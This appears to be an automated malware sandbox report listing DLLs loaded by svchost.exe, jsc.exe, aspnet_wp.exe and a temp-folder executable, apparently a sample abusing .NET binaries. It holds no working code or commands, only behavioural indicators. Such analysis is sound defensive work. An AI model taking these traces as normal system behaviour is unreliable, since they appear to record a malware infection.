                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: msvcp140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: windows.applicationmodel.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: urlmon.dll
